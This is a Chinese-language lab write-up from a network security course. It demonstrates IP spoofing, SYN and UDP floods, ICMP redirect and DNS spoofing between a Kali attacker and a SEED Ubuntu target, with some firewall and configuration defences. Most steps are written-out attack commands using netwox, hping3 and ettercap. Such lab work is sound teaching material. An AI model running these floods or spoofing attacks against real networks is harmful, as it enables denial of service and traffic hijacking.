国信安——网络协议攻防
一、IP源地址欺骗dos攻击
靶机: seed ubantu 12.04(发布者seed project)192.168.100.151 攻击机:kali linux 2.0(发布者 Offensive Security Ltd)192.168.40.132 1.在seed上开启tcpdump监听:tcpdump –i eth0 tcp port 80 -n –nn
2.在Seed节点上设置防火墙规则: iptables -A INPUT -i eth0 -s 192.168.100.125/32 -j ACCEPT iptables -A INPUT -i eth0 –s 192.168.100.1/32 -j ACCEPT iptables -A INPUT -i eth0 -p all -j DROP
3 查看一下当前防火墙状态:iptables –L 在kali上利用netwox进行IP地址欺骗,伪装成192.168.100.125,突破防火墙限制,netwox 52 -E “0:1:2:3:4:5” -I “192.168.100.125” -e “00:0c:29:eb:98:60” -i “192.168.100.151”
在seed上分析,通过tcpdump可以看到seed向192.168.100.125返回了数据包,但实际上kali的ip是192.168.40.132;
syn flood是建立在ip源地址欺骗上的攻击。在kali上通过netwox进行syn泛洪攻击:netwox 76 -i 192.168.100.151 -p 80
此时seed的80端口收到大量不同地址和端口的syn包,使用netstat查看连接情况,在防火墙作用下攻击并未成功: netstat -antu|grep :80 关闭防火墙后,再查看netstat,攻击成功,此时存在大量syn半连接: iptables -F;iptables -X;iptables –L
二、ICMP路由重定向攻击和防御
靶机: seed ubantu 12.04(发布者seed project)192.168.100.151 攻击机:kali linux 2.0(发布者 Offensive Security Ltd)192.168.40.132 1、确认seed中的路由表:route –C -n
2、在Kali节点下,利用Netwox发起ICMP路由重定向攻击: netwox 86 -g 192.168.40.132 -i 192.168.100.2
3、在Seed中查看效果: route –C -n;tcpdump -i eth0 icmp -n
4、在Linux系统中,可以禁止接收ICMP路由重定向数据包,重启网络并更改设置: /etc/init.d/networking restart
echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects echo 0 > /proc/sys/net/ipv4/conf/eth0/accept_redirects echo 0 > /proc/sys/net/ipv4/conf/default/accept_redirects 刷新路由表:ip route flush cache
5、此时再次重复前述攻击步骤,可发现攻击失败。
三、UDP Flood攻击
靶机: seed ubantu 12.04(发布者seed project)192.168.100.151 攻击机:kali linux 2.0(发布者 Offensive Security Ltd)192.168.40.132 1.在seed上开启tcpdump监听:tcpdump –i eth0 udp -n
2.在kali中向seed发起udp flood攻击: hping3 --udp -p 53 192.168.100.151
3.在seed中可以清除看到来自kali的udp攻击请求:
4.攻击进一步升级,使用工具自带的随机源地址参数进行源地址欺骗udp flood攻击: hping3 --udp -p 53 --flood --rand-source 192.168.100.151
5.在seed中可以看到大量不同源地址发的包
四、DNS欺骗攻击与防御
1、在kali中编辑ettercap的配置文件,将所有.com的域名都解析到kali的ip: vim /etc/ettercap/etter.dns *.com A 192.168.40.132
2.在kali上配置apache网站web主页,同时启动apache服务: vim /var/www/html/index.html;/etc/init.d/apache2 start
3、seed上访问sina显示正常 4. 在kali上启动ettercap工具利用arp中间人攻击实现dns欺骗: ettercap -G进入图形界面,target 1设置攻击目标,target 2设置网关
选择arp欺骗中间人攻击
6.此时再在seed上访问www.sina.com,发现访问到了我们刚才设置的kali页面上。
7.使用nslookup查看,可以看到DNS将地址解析到了kali上: nslookup www.sina.com 8.在seed中重启网络服务或重启系统清除dns缓存,然后再绑定IP/DNS映射关系,防止DNS欺骗攻击: /etc/init.d/networking restart vim /etc/hosts 将地址绑定到seed本机192.168.100.151尝试访问:
再次在kali中开启dns_spoof:回到seed可以看到,不再受到DNS欺骗攻击影响了。
